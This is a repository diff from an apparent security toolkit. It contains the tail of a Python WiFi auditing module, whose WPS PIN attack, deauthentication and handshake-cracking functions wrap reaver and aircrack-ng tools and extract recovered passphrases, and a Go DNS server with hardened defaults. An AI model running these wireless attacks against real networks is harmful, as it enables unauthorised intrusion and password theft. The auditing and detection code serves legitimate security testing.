'ssid': ap.ssid,
|
||||
'channel': ap.channel,
|
||||
'signal': ap.signal,
|
||||
'message': f'Possible evil twin: SSID "{ap.ssid}" from unknown BSSID {bssid}'
|
||||
})
|
||||
else:
|
||||
# Completely new AP
|
||||
alerts.append({
|
||||
'type': 'new_ap',
|
||||
'severity': 'low',
|
||||
'bssid': bssid,
|
||||
'ssid': ap.ssid,
|
||||
'channel': ap.channel,
|
||||
'signal': ap.signal,
|
||||
'message': f'New AP detected: "{ap.ssid}" ({bssid})'
|
||||
})
|
||||
else:
|
||||
# Known BSSID but check for SSID change
|
||||
if (bssid, ap.ssid) not in known_pairs and ap.ssid:
|
||||
alerts.append({
|
||||
'type': 'ssid_change',
|
||||
'severity': 'medium',
|
||||
'bssid': bssid,
|
||||
'ssid': ap.ssid,
|
||||
'message': f'Known AP {bssid} changed SSID to "{ap.ssid}"'
|
||||
})
|
||||
|
||||
return {
|
||||
'ok': True,
|
||||
'alerts': alerts,
|
||||
'alert_count': len(alerts),
|
||||
'scanned': len(self.scan_results),
|
||||
'known': len(self.known_aps)
|
||||
}
|
||||
|
||||
# ── WPS Attack ───────────────────────────────────────────────────────
|
||||
|
||||
def wps_scan(self, interface: str = None) -> Dict:
|
||||
"""Scan for WPS-enabled networks using wash."""
|
||||
iface = interface or self.monitor_interface
|
||||
if not self.wash:
|
||||
return {'ok': False, 'error': 'wash not found'}
|
||||
if not iface:
|
||||
return {'ok': False, 'error': 'No monitor interface'}
|
||||
|
||||
try:
|
||||
result = subprocess.run(
|
||||
[self.wash, '-i', iface, '-s'],
|
||||
capture_output=True, text=True, timeout=15
|
||||
)
|
||||
networks = []
|
||||
for line in result.stdout.splitlines():
|
||||
parts = line.split()
|
||||
if len(parts) >= 6 and re.match(r'^[0-9A-Fa-f]{2}:', parts[0]):
|
||||
networks.append({
|
||||
'bssid': parts[0],
|
||||
'channel': parts[1],
|
||||
'rssi': parts[2],
|
||||
'wps_version': parts[3],
|
||||
'locked': parts[4].upper() == 'YES',
|
||||
'ssid': ' '.join(parts[5:])
|
||||
})
|
||||
return {'ok': True, 'networks': networks, 'count': len(networks)}
|
||||
except Exception as e:
|
||||
return {'ok': False, 'error': str(e)}
|
||||
|
||||
def wps_attack(self, interface: str, bssid: str, channel: int,
|
||||
pixie_dust: bool = True, timeout: int = 300) -> str:
|
||||
"""Run WPS PIN attack (Pixie Dust or brute force). Returns job_id."""
|
||||
if not self.reaver:
|
||||
return ''
|
||||
|
||||
job_id = f'wps_{int(time.time())}'
|
||||
self._jobs[job_id] = {
|
||||
'type': 'wps', 'status': 'running', 'bssid': bssid,
|
||||
'result': None, 'started': time.time()
|
||||
}
|
||||
|
||||
def _attack():
|
||||
try:
|
||||
cmd = [self.reaver, '-i', interface, '-b', bssid, '-c', str(channel), '-vv']
|
||||
if pixie_dust:
|
||||
cmd.extend(['-K', '1'])
|
||||
|
||||
result = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)
|
||||
|
||||
pin_match = re.search(r'WPS PIN:\s*[\'"]?(\d+)', result.stdout)
|
||||
psk_match = re.search(r'WPA PSK:\s*[\'"]?(.+?)[\'"]?\s*$', result.stdout, re.M)
|
||||
|
||||
if pin_match or psk_match:
|
||||
self._jobs[job_id]['status'] = 'complete'
|
||||
self._jobs[job_id]['result'] = {
|
||||
'ok': True,
|
||||
'pin': pin_match.group(1) if pin_match else None,
|
||||
'psk': psk_match.group(1) if psk_match else None,
|
||||
'message': 'WPS attack successful'
|
||||
}
|
||||
else:
|
||||
self._jobs[job_id]['status'] = 'complete'
|
||||
self._jobs[job_id]['result'] = {
|
||||
'ok': False, 'error': 'WPS attack failed',
|
||||
'output': result.stdout[-500:] if result.stdout else ''
|
||||
}
|
||||
except subprocess.TimeoutExpired:
|
||||
self._jobs[job_id]['status'] = 'error'
|
||||
self._jobs[job_id]['result'] = {'ok': False, 'error': 'WPS attack timed out'}
|
||||
except Exception as e:
|
||||
self._jobs[job_id]['status'] = 'error'
|
||||
self._jobs[job_id]['result'] = {'ok': False, 'error': str(e)}
|
||||
|
||||
threading.Thread(target=_attack, daemon=True).start()
|
||||
return job_id
|
||||
|
||||
# ── Packet Capture ───────────────────────────────────────────────────
|
||||
|
||||
def start_capture(self, interface: str, channel: int = None,
|
||||
bssid: str = None, output_name: str = None) -> Dict:
|
||||
"""Start raw packet capture on interface."""
|
||||
if not self.airodump:
|
||||
return {'ok': False, 'error': 'airodump-ng not found'}
|
||||
|
||||
iface = interface or self.monitor_interface
|
||||
if not iface:
|
||||
return {'ok': False, 'error': 'No monitor interface'}
|
||||
|
||||
name = output_name or f'capture_{int(time.time())}'
|
||||
prefix = os.path.join(self.captures_dir, name)
|
||||
|
||||
cmd = [self.airodump, '--output-format', 'pcap,csv', '-w', prefix]
|
||||
if channel:
|
||||
cmd += ['-c', str(channel)]
|
||||
if bssid:
|
||||
cmd += ['--bssid', bssid]
|
||||
cmd.append(iface)
|
||||
|
||||
try:
|
||||
self._capture_proc = subprocess.Popen(
|
||||
cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL
|
||||
)
|
||||
return {
|
||||
'ok': True,
|
||||
'message': f'Capture started on {iface}',
|
||||
'prefix': prefix,
|
||||
'pid': self._capture_proc.pid
|
||||
}
|
||||
except Exception as e:
|
||||
return {'ok': False, 'error': str(e)}
|
||||
|
||||
def stop_capture(self) -> Dict:
|
||||
"""Stop running packet capture."""
|
||||
if self._capture_proc:
|
||||
try:
|
||||
self._capture_proc.send_signal(signal.SIGINT)
|
||||
self._capture_proc.wait(timeout=5)
|
||||
except Exception:
|
||||
self._capture_proc.kill()
|
||||
self._capture_proc = None
|
||||
return {'ok': True, 'message': 'Capture stopped'}
|
||||
return {'ok': False, 'error': 'No capture running'}
|
||||
|
||||
def list_captures(self) -> List[Dict]:
|
||||
"""List saved capture files."""
|
||||
captures = []
|
||||
cap_dir = Path(self.captures_dir)
|
||||
for f in sorted(cap_dir.glob('*.cap')) + sorted(cap_dir.glob('*.pcap')):
|
||||
captures.append({
|
||||
'name': f.name,
|
||||
'path': str(f),
|
||||
'size': f.stat().st_size,
|
||||
'modified': f.stat().st_mtime
|
||||
})
|
||||
return captures
|
||||
|
||||
# ── Job Management ───────────────────────────────────────────────────
|
||||
|
||||
def get_job(self, job_id: str) -> Optional[Dict]:
|
||||
"""Get job status."""
|
||||
return self._jobs.get(job_id)
|
||||
|
||||
def list_jobs(self) -> List[Dict]:
|
||||
"""List all jobs."""
|
||||
return [{'id': k, **v} for k, v in self._jobs.items()]
|
||||
|
||||
# ── Helpers ──────────────────────────────────────────────────────────
|
||||
|
||||
def _ap_to_dict(self, ap: AccessPoint) -> Dict:
|
||||
return {
|
||||
'bssid': ap.bssid, 'ssid': ap.ssid, 'channel': ap.channel,
|
||||
'encryption': ap.encryption, 'cipher': ap.cipher, 'auth': ap.auth,
|
||||
'signal': ap.signal, 'beacons': ap.beacons,
|
||||
'data_frames': ap.data_frames, 'clients': ap.clients
|
||||
}
|
||||
|
||||
def _client_to_dict(self, c: WifiClient) -> Dict:
|
||||
return {
|
||||
'mac': c.mac, 'bssid': c.bssid, 'signal': c.signal,
|
||||
'frames': c.frames, 'probe': c.probe
|
||||
}
|
||||
|
||||
|
||||
# ── Singleton ────────────────────────────────────────────────────────────────
|
||||
|
||||
_instance = None
|
||||
|
||||
def get_wifi_auditor() -> WiFiAuditor:
|
||||
global _instance
|
||||
if _instance is None:
|
||||
_instance = WiFiAuditor()
|
||||
return _instance
|
||||
|
||||
|
||||
# ── CLI Interface ────────────────────────────────────────────────────────────
|
||||
|
||||
def run():
|
||||
"""CLI entry point for WiFi Auditing module."""
|
||||
auditor = get_wifi_auditor()
|
||||
|
||||
while True:
|
||||
tools = auditor.get_tools_status()
|
||||
available = sum(1 for v in tools.values() if v)
|
||||
|
||||
print(f"\n{'='*60}")
|
||||
print(f" WiFi Auditing ({available}/{len(tools)} tools available)")
|
||||
print(f"{'='*60}")
|
||||
print(f" Monitor Interface: {auditor.monitor_interface or 'None'}")
|
||||
print(f" APs Found: {len(auditor.scan_results)}")
|
||||
print(f" Clients Found: {len(auditor.clients)}")
|
||||
print()
|
||||
print(" 1 — List Wireless Interfaces")
|
||||
print(" 2 — Enable Monitor Mode")
|
||||
print(" 3 — Disable Monitor Mode")
|
||||
print(" 4 — Scan Networks")
|
||||
print(" 5 — Deauth Attack")
|
||||
print(" 6 — Capture Handshake")
|
||||
print(" 7 — Crack Handshake")
|
||||
print(" 8 — WPS Scan")
|
||||
print(" 9 — Rogue AP Detection")
|
||||
print(" 10 — Packet Capture")
|
||||
print(" 11 — Tool Status")
|
||||
print(" 0 — Back")
|
||||
print()
|
||||
|
||||
choice = input(" > ").strip()
|
||||
|
||||
if choice == '0':
|
||||
break
|
||||
elif choice == '1':
|
||||
ifaces = auditor.get_interfaces()
|
||||
if ifaces:
|
||||
for i in ifaces:
|
||||
print(f" {i['name']} mode={i['mode']} ch={i['channel']}")
|
||||
else:
|
||||
print(" No wireless interfaces found")
|
||||
elif choice == '2':
|
||||
iface = input(" Interface name: ").strip()
|
||||
result = auditor.enable_monitor(iface)
|
||||
print(f" {result.get('message', result.get('error', 'Unknown'))}")
|
||||
elif choice == '3':
|
||||
result = auditor.disable_monitor()
|
||||
print(f" {result.get('message', result.get('error', 'Unknown'))}")
|
||||
elif choice == '4':
|
||||
dur = input(" Scan duration (seconds, default 15): ").strip()
|
||||
result = auditor.scan_networks(duration=int(dur) if dur.isdigit() else 15)
|
||||
if result['ok']:
|
||||
print(f" Found {result['count']} access points:")
|
||||
for ap in result['access_points']:
|
||||
print(f" {ap['bssid']} {ap['ssid']:<24} ch={ap['channel']} "
|
||||
f"sig={ap['signal']}dBm {ap['encryption']}")
|
||||
else:
|
||||
print(f" Error: {result['error']}")
|
||||
elif choice == '5':
|
||||
bssid = input(" Target BSSID: ").strip()
|
||||
client = input(" Client MAC (blank=broadcast): ").strip() or None
|
||||
count = input(" Deauth count (default 10): ").strip()
|
||||
result = auditor.deauth(auditor.monitor_interface, bssid, client,
|
||||
int(count) if count.isdigit() else 10)
|
||||
print(f" {result.get('message', result.get('error'))}")
|
||||
elif choice == '6':
|
||||
bssid = input(" Target BSSID: ").strip()
|
||||
channel = input(" Channel: ").strip()
|
||||
if bssid and channel.isdigit():
|
||||
job_id = auditor.capture_handshake(auditor.monitor_interface, bssid, int(channel))
|
||||
print(f" Handshake capture started (job: {job_id})")
|
||||
print(" Polling for result...")
|
||||
while True:
|
||||
job = auditor.get_job(job_id)
|
||||
if job and job['status'] != 'running':
|
||||
print(f" Result: {job['result']}")
|
||||
break
|
||||
time.sleep(3)
|
||||
elif choice == '7':
|
||||
cap = input(" Capture file path: ").strip()
|
||||
wl = input(" Wordlist path: ").strip()
|
||||
bssid = input(" BSSID (optional): ").strip() or None
|
||||
if cap and wl:
|
||||
job_id = auditor.crack_handshake(cap, wl, bssid)
|
||||
if job_id:
|
||||
print(f" Cracking started (job: {job_id})")
|
||||
else:
|
||||
print(" aircrack-ng not found")
|
||||
elif choice == '8':
|
||||
result = auditor.wps_scan()
|
||||
if result['ok']:
|
||||
print(f" Found {result['count']} WPS networks:")
|
||||
for n in result['networks']:
|
||||
locked = 'LOCKED' if n['locked'] else 'open'
|
||||
print(f" {n['bssid']} {n['ssid']:<24} WPS {n['wps_version']} {locked}")
|
||||
else:
|
||||
print(f" Error: {result['error']}")
|
||||
elif choice == '9':
|
||||
if not auditor.known_aps:
|
||||
print(" No baseline saved. Save current scan as baseline? (y/n)")
|
||||
if input(" > ").strip().lower() == 'y':
|
||||
auditor.save_known_aps()
|
||||
print(f" Saved {len(auditor.known_aps)} APs as baseline")
|
||||
else:
|
||||
result = auditor.detect_rogue_aps()
|
||||
if result['ok']:
|
||||
print(f" Scanned: {result['scanned']} Known: {result['known']} Alerts: {result['alert_count']}")
|
||||
for a in result['alerts']:
|
||||
print(f" [{a['severity'].upper()}] {a['message']}")
|
||||
elif choice == '10':
|
||||
print(" 1 — Start Capture")
|
||||
print(" 2 — Stop Capture")
|
||||
print(" 3 — List Captures")
|
||||
sub = input(" > ").strip()
|
||||
if sub == '1':
|
||||
result = auditor.start_capture(auditor.monitor_interface)
|
||||
print(f" {result.get('message', result.get('error'))}")
|
||||
elif sub == '2':
|
||||
result = auditor.stop_capture()
|
||||
print(f" {result.get('message', result.get('error'))}")
|
||||
elif sub == '3':
|
||||
for c in auditor.list_captures():
|
||||
print(f" {c['name']} ({c['size']} bytes)")
|
||||
elif choice == '11':
|
||||
for tool, avail in tools.items():
|
||||
status = 'OK' if avail else 'MISSING'
|
||||
print(f" {tool:<15} {status}")
|
||||
1081
services/dns-server/api/router.go
Normal file
1081
services/dns-server/api/router.go
Normal file
File diff suppressed because it is too large
Load Diff
BIN
services/dns-server/autarch-dns.exe
Normal file
BIN
services/dns-server/autarch-dns.exe
Normal file
Binary file not shown.
26
services/dns-server/build.sh
Normal file
26
services/dns-server/build.sh
Normal file
@ -0,0 +1,26 @@
|
||||
#!/bin/bash
|
||||
# Cross-compile autarch-dns for all supported platforms
|
||||
set -e
|
||||
|
||||
VERSION="1.0.0"
|
||||
OUTPUT_BASE="../../tools"
|
||||
|
||||
echo "Building autarch-dns v${VERSION}..."
|
||||
|
||||
# Linux ARM64 (Orange Pi 5 Plus)
|
||||
echo " → linux/arm64"
|
||||
GOOS=linux GOARCH=arm64 go build -ldflags="-s -w -X main.version=${VERSION}" \
|
||||
-o "${OUTPUT_BASE}/linux-arm64/autarch-dns" .
|
||||
|
||||
# Linux AMD64
|
||||
echo " → linux/amd64"
|
||||
GOOS=linux GOARCH=amd64 go build -ldflags="-s -w -X main.version=${VERSION}" \
|
||||
-o "${OUTPUT_BASE}/linux-x86_64/autarch-dns" .
|
||||
|
||||
# Windows AMD64
|
||||
echo " → windows/amd64"
|
||||
GOOS=windows GOARCH=amd64 go build -ldflags="-s -w -X main.version=${VERSION}" \
|
||||
-o "${OUTPUT_BASE}/windows-x86_64/autarch-dns.exe" .
|
||||
|
||||
echo "Done! Binaries:"
|
||||
ls -lh "${OUTPUT_BASE}"/*/autarch-dns* 2>/dev/null || true
|
||||
84
services/dns-server/config/config.go
Normal file
84
services/dns-server/config/config.go
Normal file
@ -0,0 +1,84 @@
|
||||
package config
|
||||
|
||||
import (
|
||||
"crypto/rand"
|
||||
"encoding/hex"
|
||||
)
|
||||
|
||||
// Config holds all DNS server configuration.
|
||||
type Config struct {
|
||||
ListenDNS string `json:"listen_dns"`
|
||||
ListenAPI string `json:"listen_api"`
|
||||
APIToken string `json:"api_token"`
|
||||
Upstream []string `json:"upstream"`
|
||||
CacheTTL int `json:"cache_ttl"`
|
||||
ZonesDir string `json:"zones_dir"`
|
||||
DNSSECKeyDir string `json:"dnssec_keys_dir"`
|
||||
LogQueries bool `json:"log_queries"`
|
||||
|
||||
// Hosts file support
|
||||
HostsFile string `json:"hosts_file"` // Path to hosts file (e.g., /etc/hosts)
|
||||
HostsAutoLoad bool `json:"hosts_auto_load"` // Auto-load system hosts file on start
|
||||
|
||||
// Encryption
|
||||
EnableDoH bool `json:"enable_doh"` // DNS-over-HTTPS to upstream
|
||||
EnableDoT bool `json:"enable_dot"` // DNS-over-TLS to upstream
|
||||
|
||||
// Security hardening
|
||||
RateLimit int `json:"rate_limit"` // Max queries/sec per source IP (0=unlimited)
|
||||
BlockList []string `json:"block_list"` // Blocked domain patterns
|
||||
AllowTransfer []string `json:"allow_transfer"` // IPs allowed zone transfers (empty=none)
|
||||
MinimalResponses bool `json:"minimal_responses"` // Minimize response data
|
||||
RefuseANY bool `json:"refuse_any"` // Refuse ANY queries (amplification protection)
|
||||
MaxUDPSize int `json:"max_udp_size"` // Max UDP response size
|
||||
|
||||
// Advanced
|
||||
QueryLogMax int `json:"querylog_max"` // Max query log entries (default 1000)
|
||||
NegativeCacheTTL int `json:"negative_cache_ttl"` // TTL for NXDOMAIN cache (default 60)
|
||||
PrefetchEnabled bool `json:"prefetch_enabled"` // Prefetch expiring cache entries
|
||||
ServFailCacheTTL int `json:"servfail_cache_ttl"` // TTL for SERVFAIL cache (default 30)
|
||||
}
|
||||
|
||||
// DefaultConfig returns security-hardened defaults.
|
||||
// No upstream forwarders — full recursive resolution from root hints.
|
||||
// Upstream can be configured as optional fallback if recursive fails.
|
||||
func DefaultConfig() *Config {
|
||||
return &Config{
|
||||
ListenDNS: "0.0.0.0:53",
|
||||
ListenAPI: "127.0.0.1:5380",
|
||||
APIToken: generateToken(),
|
||||
Upstream: []string{}, // Empty = pure recursive from root hints
|
||||
CacheTTL: 300,
|
||||
ZonesDir: "data/dns/zones",
|
||||
DNSSECKeyDir: "data/dns/keys",
|
||||
LogQueries: true,
|
||||
|
||||
// Hosts
|
||||
HostsFile: "",
|
||||
HostsAutoLoad: false,
|
||||
|
||||
// Encryption defaults
|
||||
EnableDoH: true,
|
||||
EnableDoT: true,
|
||||
|
||||
// Security defaults
|
||||
RateLimit: 100, // 100 qps per source IP
|
||||
BlockList: []string{},
|
||||
AllowTransfer: []string{}, // No zone transfers
|
||||
MinimalResponses: true,
|
||||
RefuseANY: true, // Block DNS amplification attacks
|
||||
MaxUDPSize: 1232, // Safe MTU, prevent fragmentation
|
||||
|
||||
// Advanced defaults
|
||||
QueryLogMax: 1000,
|
||||
NegativeCacheTTL: 60,
|
||||
PrefetchEnabled: false,
|
||||
ServFailCacheTTL: 30,
|
||||
}
|
||||
}
|
||||
|
||||
func generateToken() string {
|
||||
b := make([]byte, 16)
|
||||
rand.Read(b)
|
||||
return hex.EncodeToString(b)
|
||||
}
|
||||
13
services/dns-server/go.mod
Normal file
13
services/dns-server/go.mod
Normal file
@ -0,0 +1,13 @@
|
||||
module github.com/darkhal/autarch-dns
|
||||
|
||||
go 1.22
|
||||
|
||||
require github.com/miekg/dns v1.1.62
|
||||
|
||||
require (
|
||||
golang.org/x/mod v0.18.0 // indirect
|
||||
golang.org/x/net v0.27.0 // indirect
|
||||
golang.org/x/sync v0.7.0 // indirect
|
||||
golang.org/x/sys v0.22.0 // indirect
|
||||
golang.org/x/tools v0.22.0 // indirect
|
||||
)
|
||||
12
services/dns-server/go.sum
Normal file
12
services/dns-server/go.sum
Normal file
@ -0,0 +1,12 @@
|
||||
github.com/miekg/dns v1.1.62 h1:cN8OuEF1/x5Rq6Np+h1epln8OiyPWV+lROx9LxcGgIQ=
|
||||
github.com/miekg/dns v1.1.62/go.mod h1:mvDlcItzm+br7MToIKqkglaGhlFMHJ9DTNNWONWXbNQ=
|
||||
golang.org/x/mod v0.18.0 h1:5+9lSbEzPSdWkH32vYPBwEpX8KwDbM52Ud9xBUvNlb0=
|
||||
golang.org/x/mod v0.18.0/go.mod h1:hTbmBsO62+eylJbnUtE2MGJUyE7QWk4xUqPFrRgJ+7c=
|
||||
golang.org/x/net v0.27.0 h1:5K3Njcw06/l2y9vpGCSdcxWOYHOUk3dVNGDXN+FvAys=
|
||||
golang.org/x/net v0.27.0/go.mod h1:dDi0PyhWNoiUOrAS8uXv/vnScO4wnHQO4mj9fn/RytE=
|
||||
golang.org/x/sync v0.7.0 h1:YsImfSBoP9QPYL0xyKJPq0gcaJdG3rInoqxTWbfQu9M=
|
||||
golang.org/x/sync v0.7.0/go.mod h1:Czt+wKu1gCyEFDUtn0jG5QVvpJ6rzVqr5aXyt9drQfk=
|
||||
golang.org/x/sys v0.22.0 h1:RI27ohtqKCnwULzJLqkv897zojh5/DwS/ENaMzUOaWI=
|
||||
golang.org/x/sys v0.22.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA=
|
||||
golang.org/x/tools v0.22.0 h1:gqSGLZqv+AI9lIQzniJ0nZDRG5GBPsSi+DRNHWNz6yA=
|
||||
golang.org/x/tools v0.22.0/go.mod h1:aCwcsjqvq7Yqt6TNyX7QMU2enbQ/Gt0bo6krSeEri+c=
|
||||
84
services/dns-server/main.go
Normal file
84
services/dns-server/main.go
Normal file
@ -0,0 +1,84 @@
|
||||
package main
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"flag"
|
||||
"fmt"
|
||||
"log"
|
||||
"os"
|
||||
"os/signal"
|
||||
"syscall"
|
||||
|
||||
"github.com/darkhal/autarch-dns/api"
|
||||
"github.com/darkhal/autarch-dns/config"
|
||||
"github.com/darkhal/autarch-dns/server"
|
||||
)
|
||||
|
||||
var version = "2.1.0"
|
||||
|
||||
func main() {
|
||||
configPath := flag.String("config", "config.json", "Path to config file")
|
||||
listenDNS := flag.String("dns", "", "DNS listen address (overrides config)")
|
||||
listenAPI := flag.String("api", "", "API listen address (overrides config)")
|
||||
apiToken := flag.String("token", "", "API auth token (overrides config)")
|
||||
showVersion := flag.Bool("version", false, "Show version")
|
||||
flag.Parse()
|
||||
|
||||
if *showVersion {
|
||||
fmt.Printf("autarch-dns v%s\n", version)
|
||||
os.Exit(0)
|
||||
}
|
||||
|
||||
// Load config
|
||||
cfg := config.DefaultConfig()
|
||||
if data, err := os.ReadFile(*configPath); err == nil {
|
||||
if err := json.Unmarshal(data, cfg); err != nil {
|
||||
log.Printf("Warning: invalid config file: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
// CLI overrides
|
||||
if *listenDNS != "" {
|
||||
cfg.ListenDNS = *listenDNS
|
||||
}
|
||||
if *listenAPI != "" {
|
||||
cfg.ListenAPI = *listenAPI
|
||||
}
|
||||
if *apiToken != "" {
|
||||
cfg.APIToken = *apiToken
|
||||
}
|
||||
|
||||
// Initialize zone store
|
||||
store := server.NewZoneStore(cfg.ZonesDir)
|
||||
if err := store.LoadAll(); err != nil {
|
||||
log.Printf("Warning: loading zones: %v", err)
|
||||
}
|
||||
|
||||
// Start DNS server
|
||||
dnsServer := server.NewDNSServer(cfg, store)
|
||||
go func() {
|
||||
log.Printf("DNS server listening on %s (UDP+TCP)", cfg.ListenDNS)
|
||||
if err := dnsServer.Start(); err != nil {
|
||||
log.Fatalf("DNS server error: %v", err)
|
||||
}
|
||||
}()
|
||||
|
||||
// Start API server
|
||||
apiServer := api.NewAPIServer(cfg, store, dnsServer)
|
||||
go func() {
|
||||
log.Printf("API server listening on %s", cfg.ListenAPI)
|
||||
if err := apiServer.Start(); err != nil {
|
||||
log.Fatalf("API server error: %v", err)
|
||||
}
|
||||
}()
|
||||
|
||||
log.Printf("autarch-dns v%s started", version)
|
||||
|
||||
// Wait for shutdown signal
|
||||
sig := make(chan os.Signal, 1)
|
||||
signal.Notify(sig, syscall.SIGINT, syscall.SIGTERM)
|
||||
<-sig
|
||||
|
||||
log.Println("Shutting down...")
|
||||
dnsServer.Stop()
|
||||
}
|
||||
656
services/dns-server/server/dns.go
Normal file
656
services/dns-server/server/dns.go
Normal file
@ -0,0 +1,656 @@
|
||||
package server
|
||||
|
||||
import (
|
||||
"log"
|
||||
"sort"
|
||||
"strings"
|
||||
"sync"
|
||||
"sync/atomic"
|
||||
"time"
|
||||
|
||||
"github.com/darkhal/autarch-dns/config"
|
||||
"github.com/miekg/dns"
|
||||
)
|
||||
|
||||
// Metrics holds query statistics.
|
||||
type Metrics struct {
|
||||
TotalQueries uint64 `json:"total_queries"`
|
||||
CacheHits uint64 `json:"cache_hits"`
|
||||
CacheMisses uint64 `json:"cache_misses"`
|
||||
LocalAnswers uint64 `json:"local_answers"`
|
||||
ResolvedQ uint64 `json:"resolved"`
|
||||
BlockedQ uint64 `json:"blocked"`
|
||||
FailedQ uint64 `json:"failed"`
|
||||
StartTime string `json:"start_time"`
|
||||
}
|
||||
|
||||
// QueryLogEntry records a single DNS query.
|
||||
type QueryLogEntry struct {
|
||||
Timestamp string `json:"timestamp"`
|
||||
Client string `json:"client"`
|
||||
Name string `json:"name"`
|
||||
Type string `json:"type"`
|
||||
Rcode string `json:"rcode"`
|
||||
Answers int `json:"answers"`
|
||||
Latency string `json:"latency"`
|
||||
Source string `json:"source"` // "local", "cache", "recursive", "blocked", "failed"
|
||||
}
|
||||
|
||||
// CacheEntry holds a cached DNS response.
|
||||
type CacheEntry struct {
|
||||
msg *dns.Msg
|
||||
expiresAt time.Time
|
||||
}
|
||||
|
||||
// CacheInfo is an exportable view of a cache entry.
|
||||
type CacheInfo struct {
|
||||
Key string `json:"key"`
|
||||
Name string `json:"name"`
|
||||
Type string `json:"type"`
|
||||
TTL int `json:"ttl_remaining"`
|
||||
Answers int `json:"answers"`
|
||||
ExpiresAt string `json:"expires_at"`
|
||||
}
|
||||
|
||||
// DomainCount tracks query frequency per domain.
|
||||
type DomainCount struct {
|
||||
Domain string `json:"domain"`
|
||||
Count uint64 `json:"count"`
|
||||
}
|
||||
|
||||
// DNSServer is the main DNS server.
|
||||
type DNSServer struct {
|
||||
cfg *config.Config
|
||||
store *ZoneStore
|
||||
hosts *HostsStore
|
||||
resolver *RecursiveResolver
|
||||
metrics Metrics
|
||||
cache map[string]*CacheEntry
|
||||
cacheMu sync.RWMutex
|
||||
udpServ *dns.Server
|
||||
tcpServ *dns.Server
|
||||
|
||||
// Query log — ring buffer
|
||||
queryLog []QueryLogEntry
|
||||
queryLogMu sync.RWMutex
|
||||
queryLogMax int
|
||||
|
||||
// Domain frequency tracking
|
||||
domainCounts map[string]uint64
|
||||
domainCountsMu sync.RWMutex
|
||||
|
||||
// Query type tracking
|
||||
typeCounts map[string]uint64
|
||||
typeCountsMu sync.RWMutex
|
||||
|
||||
// Client tracking
|
||||
clientCounts map[string]uint64
|
||||
clientCountsMu sync.RWMutex
|
||||
|
||||
// Blocklist — fast lookup
|
||||
blocklist map[string]bool
|
||||
blocklistMu sync.RWMutex
|
||||
|
||||
// Conditional forwarding: zone -> upstream servers
|
||||
conditionalFwd map[string][]string
|
||||
conditionalFwdMu sync.RWMutex
|
||||
}
|
||||
|
||||
// NewDNSServer creates a DNS server.
|
||||
func NewDNSServer(cfg *config.Config, store *ZoneStore) *DNSServer {
|
||||
resolver := NewRecursiveResolver()
|
||||
resolver.EnableDoT = cfg.EnableDoT
|
||||
resolver.EnableDoH = cfg.EnableDoH
|
||||
|
||||
logMax := cfg.QueryLogMax
|
||||
if logMax <= 0 {
|
||||
logMax = 1000
|
||||
}
|
||||
|
||||
s := &DNSServer{
|
||||
cfg: cfg,
|
||||
store: store,
|
||||
hosts: NewHostsStore(),
|
||||
resolver: resolver,
|
||||
cache: make(map[string]*CacheEntry),
|
||||
queryLog: make([]QueryLogEntry, 0, logMax),
|
||||
queryLogMax: logMax,
|
||||
domainCounts: make(map[string]uint64),
|
||||
typeCounts: make(map[string]uint64),
|
||||
clientCounts: make(map[string]uint64),
|
||||
blocklist: make(map[string]bool),
|
||||
conditionalFwd: make(map[string][]string),
|
||||
metrics: Metrics{
|
||||
StartTime: time.Now().UTC().Format(time.RFC3339),
|
||||
},
|
||||
}
|
||||
|
||||
// Load blocklist from config
|
||||
for _, pattern := range cfg.BlockList {
|
||||
s.blocklist[dns.Fqdn(strings.ToLower(pattern))] = true
|
||||
}
|
||||
|
||||
// Load hosts file if configured
|
||||
if cfg.HostsFile != "" {
|
||||
if err := s.hosts.LoadFile(cfg.HostsFile); err != nil {
|
||||
log.Printf("[hosts] Warning: could not load hosts file %s: %v", cfg.HostsFile, err)
|
||||
}
|
||||
}
|
||||
|
||||
return s
|
||||
}
|
||||
|
||||
// GetHosts returns the hosts store.
|
||||
func (s *DNSServer) GetHosts() *HostsStore {
|
||||
return s.hosts
|
||||
}
|
||||
|
||||
// GetEncryptionStatus returns encryption info from the resolver.
|
||||
func (s *DNSServer) GetEncryptionStatus() map[string]interface{} {
|
||||
return s.resolver.GetEncryptionStatus()
|
||||
}
|
||||
|
||||
// SetEncryption updates DoT/DoH settings on the resolver.
|
||||
func (s *DNSServer) SetEncryption(dot, doh bool) {
|
||||
s.resolver.EnableDoT = dot
|
||||
s.resolver.EnableDoH = doh
|
||||
s.cfg.EnableDoT = dot
|
||||
s.cfg.EnableDoH = doh
|
||||
}
|
||||
|
||||
// GetResolver returns the underlying recursive resolver.
|
||||
func (s *DNSServer) GetResolver() *RecursiveResolver {
|
||||
return s.resolver
|
||||
}
|
||||
|
||||
// Start begins listening on UDP and TCP.
|
||||
func (s *DNSServer) Start() error {
|
||||
mux := dns.NewServeMux()
|
||||
mux.HandleFunc(".", s.handleQuery)
|
||||
|
||||
s.udpServ = &dns.Server{Addr: s.cfg.ListenDNS, Net: "udp", Handler: mux}
|
||||
s.tcpServ = &dns.Server{Addr: s.cfg.ListenDNS, Net: "tcp", Handler: mux}
|
||||
|
||||
errCh := make(chan error, 2)
|
||||
go func() { errCh <- s.udpServ.ListenAndServe() }()
|
||||
go func() { errCh <- s.tcpServ.ListenAndServe() }()
|
||||
|
||||
go s.cacheCleanup()
|
||||
|
||||
return <-errCh
|
||||
}
|
||||
|
||||
// Stop shuts down both servers.
|
||||
func (s *DNSServer) Stop() {
|
||||
if s.udpServ != nil {
|
||||
s.udpServ.Shutdown()
|
||||
}
|
||||
if s.tcpServ != nil {
|
||||
s.tcpServ.Shutdown()
|
||||
}
|
||||
}
|
||||
|
||||
// GetMetrics returns current metrics.
|
||||
func (s *DNSServer) GetMetrics() Metrics {
|
||||
return Metrics{
|
||||
TotalQueries: atomic.LoadUint64(&s.metrics.TotalQueries),
|
||||
CacheHits: atomic.LoadUint64(&s.metrics.CacheHits),
|
||||
CacheMisses: atomic.LoadUint64(&s.metrics.CacheMisses),
|
||||
LocalAnswers: atomic.LoadUint64(&s.metrics.LocalAnswers),
|
||||
ResolvedQ: atomic.LoadUint64(&s.metrics.ResolvedQ),
|
||||
BlockedQ: atomic.LoadUint64(&s.metrics.BlockedQ),
|
||||
FailedQ: atomic.LoadUint64(&s.metrics.FailedQ),
|
||||
